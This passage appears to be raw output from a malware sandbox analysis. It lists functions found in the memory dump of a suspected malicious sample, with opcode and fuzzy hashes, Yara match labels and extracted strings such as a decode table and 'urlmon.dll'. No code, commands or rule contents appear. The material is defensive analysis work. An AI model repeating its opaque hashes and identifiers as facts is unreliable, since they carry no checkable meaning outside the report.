                                                      Function 043E8943 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 89
                                                      • API String ID: 0-155395596
                                                      • Opcode ID: 2649da703f43d82ccd867be1a1aa003eb75e2b5fdd9e8d2a29e8c6acea2f4457
                                                      • Instruction ID: 2ef8e3c35aca122d9b30964dcf926a3e06198be17b2b91756969411f7ddcdbba
                                                      • Opcode Fuzzy Hash: 2649da703f43d82ccd867be1a1aa003eb75e2b5fdd9e8d2a29e8c6acea2f4457
                                                      • Instruction Fuzzy Hash: 1701E1B6C1121DAFCB44DFE8D9405EEBBF8AF18200F14426EE509F3200F7706A048BA5
                                                      Function 043C80C3 Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1fc905c1ea00a9bd72f704a07f2769a2f9c088b21bafe928cdeb1ab49d4bfcf
                                                      • Instruction ID: 2bc677538b716dbee29c066a9cc770d5a33a452af2a7fcc72b043d5d5d8ffeba
                                                      • Opcode Fuzzy Hash: d1fc905c1ea00a9bd72f704a07f2769a2f9c088b21bafe928cdeb1ab49d4bfcf
                                                      • Instruction Fuzzy Hash: 11410DB1D11228AFDB14DF99DC81AEEBBBCEF49710F10415AF914E7240D7B0AA41CBA4
                                                      Function 043EC243 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c68e728ad39377c440db94a4305d40df19ea38251ebc9d98e5bffa51801b772c
                                                      • Instruction ID: 7c2fcc49f334163f4d81aae3b754118edc0f06dbe4d357f7a2457913e2b8c86e
                                                      • Opcode Fuzzy Hash: c68e728ad39377c440db94a4305d40df19ea38251ebc9d98e5bffa51801b772c
                                                      • Instruction Fuzzy Hash: 3931B4B5A01219ABDB04DF99D881EEEB7B9AF8C314F105219FD18A3380D770A9518BA4
                                                      Function 043EC3A3 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1465728481726c9bb084e5323f0b8c86563e54366064e15e4f0de43792759f49
                                                      • Instruction ID: e596c0681697c94d513bd76e68ce2918fd273f25486469ffcd52eed63a245b6e
                                                      • Opcode Fuzzy Hash: 1465728481726c9bb084e5323f0b8c86563e54366064e15e4f0de43792759f49
                                                      • Instruction Fuzzy Hash: 0931E875A01219ABDB14DF59D881EEEB7B9EF8C314F104149FD18A7240D770B911CFA4
                                                      Function 043EBC73 Relevance: .1, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf59704195b66fb7adfe885d8282062d782155b19b97d5ef3b0af0814e34e8bc
                                                      • Instruction ID: e7bc1b902902f1ac3f3865dd96a3e5b715e1e68036e775883ecebdabc39124a3
                                                      • Opcode Fuzzy Hash: cf59704195b66fb7adfe885d8282062d782155b19b97d5ef3b0af0814e34e8bc
                                                      • Instruction Fuzzy Hash: 48212871A01219ABDB14DF99D881EEFB7A9EF88314F10410AFD08A7280D670B911CBA4
                                                      Function 043DBEE3 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30ed1e580f51b9fdfb385233cd1a3d6e0381c1a852b5e522095ad86d7e4fcf54
                                                      • Instruction ID: 95542e491a0611586ec61c07955fb2ff3dd800655148aa79c2f07aa596f15b57
                                                      • Opcode Fuzzy Hash: 30ed1e580f51b9fdfb385233cd1a3d6e0381c1a852b5e522095ad86d7e4fcf54
                                                      • Instruction Fuzzy Hash: 391182B27813157BF720AA569C83FBB775C9F84B64F244015FB08AA2C1D6A4F8114AB8
                                                      Function 043EC5D3 Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: edb61928ddc110c50227f978e25d92ae28684a7415598fe82f2fd0afd04935d9
                                                      • Instruction ID: e74c5d33cbdff9b14791578cf85e6df4e185d1fad1614f3b385a62c2128624ad
                                                      • Opcode Fuzzy Hash: edb61928ddc110c50227f978e25d92ae28684a7415598fe82f2fd0afd04935d9
                                                      • Instruction Fuzzy Hash: 41212C71A01219ABEB10DF99DC81FAFB7A9EF88710F108509FD19A7280D770B911CBA5
                                                      Function 043E8E73 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 524dc6206e01c3e9c33a02f91046b9327b906cb3388c6a048744424f6c9ac9e7
                                                      • Instruction ID: acc5646973040c0ba280d55a62b0915b4359df1ff4cf17115c211153b9d22092
                                                      • Opcode Fuzzy Hash: 524dc6206e01c3e9c33a02f91046b9327b906cb3388c6a048744424f6c9ac9e7
                                                      • Instruction Fuzzy Hash: E111ECB6D0121DAF9B00DFE9D9409EFBBF8EF58214F04416BE919E7200E7706A15CBA1
                                                      Function 043EB933 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39e76324e7fdf23ec09505b0dfe2d2cb0445c19521f5be90ac65fcd709eedb8f
                                                      • Instruction ID: 1dd748ca44963961705bf1abb75a19f364fcafa9c9fd25be99f4f19630802700
                                                      • Opcode Fuzzy Hash: 39e76324e7fdf23ec09505b0dfe2d2cb0445c19521f5be90ac65fcd709eedb8f
                                                      • Instruction Fuzzy Hash: 92114F71A02214BBE710EF69DC41FAFB7ACEF85614F104549FD0997280D67079108BE1
                                                      Function 043E89D3 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fd9092fa67c07b315ca81b159aa001320b96b8d36712904eed0c0a88b28bf36
                                                      • Instruction ID: 78687c922ad298dc35716646ce54976a03ed1915c2b0996b438e83605cc1b1e4
                                                      • Opcode Fuzzy Hash: 5fd9092fa67c07b315ca81b159aa001320b96b8d36712904eed0c0a88b28bf36
                                                      • Instruction Fuzzy Hash: B011EFB6D1121DAF9B00DFE9D9409EFBBF9FF48314F14416AE919E7200E7706A148BA1
                                                      Function 043EBA93 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e053dadde2db99efb27cff60e39a2967c88d526139b902b6be2feea9adb50796
                                                      • Instruction ID: 6e6c368d2926d1937263ee4ab3ffd352a5d5eb262764adf5ece1ef3f521a6ae1
                                                      • Opcode Fuzzy Hash: e053dadde2db99efb27cff60e39a2967c88d526139b902b6be2feea9adb50796
                                                      • Instruction Fuzzy Hash: 46118C71A062147BE710EBA9DC41FAFB7ACEF89214F10454AFD18A7280D6707A008BE1
                                                      Function 043E9C03 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a662ecae608d274716e29e052d2f6b4edb4032cbd25c2a3758f72d031b6e20e3
                                                      • Instruction ID: 694cd33ea99678caf0811578c12727e6114c3bf33dd22ac0b826ffb8c40cf779
                                                      • Opcode Fuzzy Hash: a662ecae608d274716e29e052d2f6b4edb4032cbd25c2a3758f72d031b6e20e3
                                                      • Instruction Fuzzy Hash: F411FBB6D01218AF9B01DFA9D8409EEBBFCEF48210F04456BE919E3200E7706A048BE0
                                                      Function 043E5303 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbfc2acaa44d5df47b4d0dc846a562b6e94538f31926e2c5643bd58962f734f3
                                                      • Instruction ID: 35532c62808de69c744e894e366ca93a4a1f1644c74001e3d082ac506b10788d
                                                      • Opcode Fuzzy Hash: cbfc2acaa44d5df47b4d0dc846a562b6e94538f31926e2c5643bd58962f734f3
                                                      • Instruction Fuzzy Hash: E80196B6A022246BFB10AA56DC46EFF736CDF44614F041256FD18972C0FA70BE518AE1
                                                      Function 043E9563 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 765417f70121d1bfb187ed6377d534c4bce20518d1011533418feb12d4bf4a34
                                                      • Instruction ID: bd9a2dd883b4b98853495daa8e680ca96968587aaf7e94470adfaac4f1a48df4
                                                      • Opcode Fuzzy Hash: 765417f70121d1bfb187ed6377d534c4bce20518d1011533418feb12d4bf4a34
                                                      • Instruction Fuzzy Hash: A211EFB6D0121CAFDB01DFE9D8419EEBBF8EF48210F04456BE919E7240E7745A448BE1
                                                      Function 043C8273 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a0d1d6645a7345b9a32ee4d4b89059fc57701b29de53de2822092c7b08fa2b1f
                                                      • Instruction ID: 48060642ba2cb8b607d3ef676b1baaacdfffdc3312732f7049ab712a270c5412
                                                      • Opcode Fuzzy Hash: a0d1d6645a7345b9a32ee4d4b89059fc57701b29de53de2822092c7b08fa2b1f
                                                      • Instruction Fuzzy Hash: 67019C3A508A538FE715CB68B8841E8FFD1FB4733131866BEC4915BA91E3222D678790
                                                      Function 043DC09C Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50e719b33666c52ae451c32dedd5c396b53287c548881acf291c87044188a2f4
                                                      • Instruction ID: b9c7342172f4c23e03de2a7016c4eb37d3a5e6f56b80a31fe85eec9553299c5a
                                                      • Opcode Fuzzy Hash: 50e719b33666c52ae451c32dedd5c396b53287c548881acf291c87044188a2f4
                                                      • Instruction Fuzzy Hash: CC01D6F295421579FB20BAB1AC46FB767A89F49204F016195A90CD71C1E931A6408A61
                                                      Function 043EC923 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 35b01c1212d585122ab2bc1ded5d023e9505cf5357cb9f81e14728261203d902
                                                      • Instruction ID: 8a52b552606e7b5f4056d67d03bf54e03a4af730133284a26ef269c85143d5e7
                                                      • Opcode Fuzzy Hash: 35b01c1212d585122ab2bc1ded5d023e9505cf5357cb9f81e14728261203d902
                                                      • Instruction Fuzzy Hash: 910196B2214109BBDB44DF99DC80EEB77ADAF8C714F508109BA09E3640D670FC518BA4
                                                      Function 043C8056 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16e68291e5f1144aaad59128edfe12be380b3f8bac51cee8c8e43e08e9b76d97
                                                      • Instruction ID: 85d0395f6c863135c79010473344c04103aed6b0058e6b71e27bd7ea18fa68c8
                                                      • Opcode Fuzzy Hash: 16e68291e5f1144aaad59128edfe12be380b3f8bac51cee8c8e43e08e9b76d97
                                                      • Instruction Fuzzy Hash: A601DBB1C25229AE8B44CFA998801DDBFF8EA09721B10915FE828E7200D37156418FD4
                                                      Function 043C8213 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6dac9f7ee66c5cf9296b9a5519d7ea91a874a9a2f40eeac3a17dd4b293f14f0d
                                                      • Instruction ID: 34cd38bd2262d53551e0c98b517c3f1fc01890fe855f0d5751bb91d2b726db3a
                                                      • Opcode Fuzzy Hash: 6dac9f7ee66c5cf9296b9a5519d7ea91a874a9a2f40eeac3a17dd4b293f14f0d
                                                      • Instruction Fuzzy Hash: 63F027736142162BE7146A5DBC44B86F79CEB84335F212222F91C87241D671F81183A0
                                                      Function 043EBB83 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc46a1dc9d35200643cc6c9881224f99d0ee1eca2f3c438a06d3c232b2ebafe8
                                                      • Instruction ID: e38b15c757a074303b3a8e333e7d0ab09d84c953f7961a9c7a3ce3fd092e3b7e
                                                      • Opcode Fuzzy Hash: bc46a1dc9d35200643cc6c9881224f99d0ee1eca2f3c438a06d3c232b2ebafe8
                                                      • Instruction Fuzzy Hash: 9DF0587120021A7BDB00EF89DC40EAB77ADEF88710F004419BA0897241C270B9108BF4
                                                      Function 043C8208 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7c1f18ce56a780d48ee2de496c622ddfc272c77baf46702fa0351342dd500e4a
                                                      • Instruction ID: efbe5346fbb120186bb7e419467a30b051a26271a3167a67c8711e5277e29ad2
                                                      • Opcode Fuzzy Hash: 7c1f18ce56a780d48ee2de496c622ddfc272c77baf46702fa0351342dd500e4a
                                                      • Instruction Fuzzy Hash: B3E068734141166787081A68AC449C2FBACFF8A2303153215E8684B221D271B81083E0
                                                      Function 043DC003 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17e63730570b8b109076dbdd3dff8216ed19a60b3c7ee33549029bc6de942bd8
                                                      • Instruction ID: 7369f5b99c9429405224de03e1c08feef198d3ff44492935c5082e3fc120c8eb
                                                      • Opcode Fuzzy Hash: 17e63730570b8b109076dbdd3dff8216ed19a60b3c7ee33549029bc6de942bd8
                                                      • Instruction Fuzzy Hash: C6F08271C15209EBDB14CFA4E841BDDFBB8EB04320F10436AE8249B2C0E635A751D781
                                                      Function 043EC843 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction ID: 327677bcc1f041b5b1b2d79cd8a863be6476362e06076aa7d9dddfea2ccd4d45
                                                      • Opcode Fuzzy Hash: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction Fuzzy Hash: 3BE065726042197BEA10EE59DC41FAB33ADEF88714F000419FA08A7281C670B9108BF8
                                                      Function 043EE503 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1472f6ffcf88f3fb0ccee0f51451f254a1df9a5c3a4c8b1c4fa4b03fca464e5
                                                      • Instruction ID: b52ca5f608c2add00eb08cb5f9d292967b9aa21b6a0f5fb0377606d2b2f2d1a8
                                                      • Opcode Fuzzy Hash: d1472f6ffcf88f3fb0ccee0f51451f254a1df9a5c3a4c8b1c4fa4b03fca464e5
                                                      • Instruction Fuzzy Hash: DBE04F76A0223467E220568A9C06FBB775C8FC5E60F151065FE089B385E670B90146E5
                                                      Function 043DC001 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfa7c97b8c020657d1ff543eea6d46bb6f18ccc184f15e92086390611f3a06e0
                                                      • Instruction ID: c1edfee7134ff3ea75a2c6da3dc42010d54c797ad1ab1b2ca3d8918d269ee4c5
                                                      • Opcode Fuzzy Hash: dfa7c97b8c020657d1ff543eea6d46bb6f18ccc184f15e92086390611f3a06e0
                                                      • Instruction Fuzzy Hash: 85E06571925108E7DB14CFA4F441BADB7B8EB44260F10536AE819DB280E235E755D781
                                                      Function 043EC533 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction ID: c20d03f6b30df76a6d281e8d47bbc5b3cf310cee480c72561a6141a32fa485c8
                                                      • Opcode Fuzzy Hash: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction Fuzzy Hash: 86E046326402247BE620AB5ADC40FAB77ACDFC5725F104429FA0CA7281C670BA118BF4
                                                      Function 043CF224 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af7d881b677a493564ad801b6d0d4889f8d24ee74fa742d5ddcccab6c345131f
                                                      • Instruction ID: 0ecf3ff790fc0770abc4bc1e254812f40a63ab123b2aebece0e984a66342aa3d
                                                      • Opcode Fuzzy Hash: af7d881b677a493564ad801b6d0d4889f8d24ee74fa742d5ddcccab6c345131f
                                                      • Instruction Fuzzy Hash: C1A0124200404128541134600AC10F755C2448743478103281D7598DE1B24008A04083

                                                      Non-executed Functions

                                                      Function 043D8265 Relevance: 51.4, Strings: 41, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                      • API String ID: 0-3248090998
                                                      • Opcode ID: a4899bd9cb2299ab5986f9304200f72fd916a849d941a35e42ac20b88ea7c6e7
                                                      • Instruction ID: 05f932db609321ef249e110d0c54d4cae5f85e8a4b54f79e91b25dc52a94858b
                                                      • Opcode Fuzzy Hash: a4899bd9cb2299ab5986f9304200f72fd916a849d941a35e42ac20b88ea7c6e7
                                                      • Instruction Fuzzy Hash: EF911FF18052A98ACB118F55A4603DFBF71BB95204F1581E9C6AA7B203C3BE5E46DF90
                                                      Function 043D8273 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                      • API String ID: 0-3248090998
                                                      • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                      • Instruction ID: 9a35ccd529d5b6d9dcf8d74566ad05b9d264e3880dd5ac30c69247aa8e740669
                                                      • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                      • Instruction Fuzzy Hash: BD9110F08042A88ACB118F59A5603DFBF71BB85304F1581E9C6AA7B203C3BE5E45DF90
                                                      Function 043E5FA3 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                      • API String ID: 0-1002149817
